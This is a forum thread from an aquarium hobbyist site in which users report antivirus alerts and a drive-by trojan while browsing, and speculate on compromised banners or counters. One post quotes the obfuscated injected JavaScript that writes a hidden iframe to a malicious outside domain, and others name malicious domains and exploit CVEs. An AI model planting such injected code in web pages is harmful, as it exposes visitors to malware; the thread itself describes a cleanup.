AA main page...Trojan?

The friendliest place on the web for anyone with an interest in aquariums or fish keeping!
If you have answers, please help by responding to the unanswered posts.
ddcarnage said:
Ok I'm not sure if this is going to help you guys but I've solved my problem. I had been hacked because of a vulnerability in a third party php script I was using some time ago.

I seems that when my system was comprimised, the hackers modified a very important php file in my message board system to print the following :

Code:
document.write("<ifr"+"ame src=http://goo"+"gler"+"ank.info/cou"+"nter width=1 height=1 style=displ"+"ay:none></ifra"+"me>");

Removing that solved the virus problem.

Cheers and good luck.

If this works I think there should be an aquarium advice poety competition in honour of our helpful friend.

"An ode to my Dwarf Cichlid" 8)

John

ddcarnage said:
Hello,

I'm the admin of a poetry website (lapassiondespoemes.com). We're running a totally custom message board system and we've been having the exact same problem. I found this thread on google while searching for info on the problem.

Users reported files being downloaded from s99.winmplayer.com at first. Now it seems to have switched to s99.msiesettings.com.

I'll post more info here if ever I find any...

Frank

Just stumbled on this thread...

I can report the same issue regarding the domains noted above. I *think* it's the same issue AA had on their main page several months ago... some bad code in a counter or a compromised banner ad?

My Norton Firewall picked it up, and I'm running Firefox with totally up-to-date Vista32. Just thought I'd pass it on.

Just wanted to report the same problem....

PC1 - Windows XP , IE7, AVG 7.5
PC2 - Vista Business, IE7, Sophos AV

Both pc's report 3 viruses and cause my pc to slow right down for approx 3 minutes while they are removed.

Kurt_Nelson said:
ddcarnage said:
Hello,

I'm the admin of a poetry website (lapassiondespoemes.com). We're running a totally custom message board system and we've been having the exact same problem. I found this thread on google while searching for info on the problem.

Users reported files being downloaded from s99.winmplayer.com at first. Now it seems to have switched to s99.msiesettings.com.

I'll post more info here if ever I find any...

Frank

Just stumbled on this thread...

I can report the same issue regarding the domains noted above. I *think* it's the same issue AA had on their main page several months ago... some bad code in a counter or a compromised banner ad?

My Norton Firewall picked it up, and I'm running Firefox with totally up-to-date Vista32. Just thought I'd pass it on.

Actually... what I meant to say, but failed to type it (!), was that I had this problem right around the same time "Frank" did. But it was only for a day. I'm not picking up any issues at this time. Because it's an on again, off again thing, that's why I'm thinking it's tied into one of the rotating banners, or a counter - something that isn't hard coded on your server. Someone is hacking into code that's being linked into AA... not AA itself.

I took note yesterday that when it popped up the Aquarium Guys banner was at the top. When I refreshed again to the Aquarium Guys banner it didn't cause the alert.

I take back my previous comment. NAV firewall blocked it again tonight:

Details: Attempted Intrusion "HTTP WebViewFolderIcon SetSlice BO" against your machine was detected and blocked.
Intruder: s99.msiesettings.com(http(80)).

You might check out this thread...

http://forum.powweb.com/showthread.php?p=426599

Sounds like they got rid of it. (And AA got a plug too!)

I've been getting various quarantines here using IE 7 and webroot Spysweeper. Today it quarantined the same virus nomerous times on different forum pages.

JS/CryptDown-A

For the first time yesterday I used IE and it gave me the warning. I just firefox and never have a problem.

I use IE all the time, and never got anything til just now. It acted like it wanted to crash my laptop. My AVG came up with 2 viruses and 1 Trojan, both are still in my AVG Virus Vault. The 2 viruses are as follows:
Exploit
Exploit.CVE-2005-1790

And the Trojan is:
Trojan horse Exploit.CVE-2006-1359

The first virus AVG has it as Healable, but the other 2 are not Healable.
So I just deleted all 3 now.Willsee if it comes up again.

When I got them, my system also told me it was almost out of resources, and said Windows needed to increase page file size, and that some programs might need to be closed for this operation to complete. The only thing I even had open was IE, and only have AVG running in the background.

Whatever the problem is they need to fix it. I too receive a notification that my computer blocked a hack attempt each time I log into the sight. This thread has been opened almost a month now. What are they doing.

I'm now upto four different viruses being blocked simultaneously when I first visit the site. This appears to be getting worse. I may have to take a break from AA until the problem is fixed, because this last it brought my laptop to a screeching hault and one of the viruses couldn't be cleaned or quarentined. Luckily it was an older exploit that my system has already been patched to avoid.

Looks like I'll have to stay off AA for a few weeks until the server is cleaned of Trojans/Viruses.

at home
Win XP SP2 media center edition
IE 6
McAffee finds the trojan

at work
Win XP SP2 professional
IE 6
Trend Micro Professional found trojan one time and now the firewall seems to be blocking further downloads of the trojan on future visits.

chase33 said:
Whatever the problem is they need to fix it. I too receive a notification that my computer blocked a hack attempt each time I log into the sight. This thread has been opened almost a month now. What are they doing.

The problem is that "they" is probably just one guy! It's not like AA has an IT staff or anything!

This thing is annoying, but I can see where it's hard to track down. Like right now, I've surfed all over the AA site, TRYING to sniff where it's at, and it's not giving me any warnings. It comes and goes. While I have no knowledge of what's being done behind the scenes, it doesn't appear that it's something hard coded/hacked on the AA site - or we'd get the warnings all the time. Most likely, one of the external links/banners has been hacked and it's being pulled in from there. That's probably what's making it tricky to find and fix... the source is not within AA's control.

Just another good lesson on why it's important to use a firewall and/or antivirus scanners.

This is what Fishfreek said a few posts back:

Not constantly posting does not mean one is not looking into this. I have been looking into this for a while and trying random code removals to correct it. This site is heavily modded and removing the wrong thing will take the site down 100%. I have never seen this message myself and I run Mcafee at work and AVG at home. Both reported as giving the error.

Please be patient.

Kurt is correct. We do not have an IT Department. The admins are trying to take care of the problem but as Lindsay pointed out, FF is aware of the problem and is trying to fix it. I don't know if it's a banner problem or not. I get the error message from the first page I open a post directly from an e-mail notification. If I have 40 AA e-mails the Trojan will only appear on the first e-mail that I click from. It doesn't matter what banner is at the top of the page or who has responded to the post.

Fishyfanatic said:
...If I have 40 AA e-mails the Trojan will only appear on the first e-mail that I click from. It doesn't matter what banner is at the top of the page or who has responded to the post.

Actually... depending on what type of firewall you're running, the offending script might be associated with all the emails - or actually the AA page you're linking to -, but you're just seeing the warning on the first one. With me, my firewall detects the script and then blocks the IP address that script is being called from for 30 minutes. That 30 minute "time out" would give the appearance that the first email was the bad one, but all the rest were OK. In reality, they're probably all bad, but because of the 30 minute block on that IP, you're not seeing it anymore.

Hope that makes sense...

Back
Top Bottom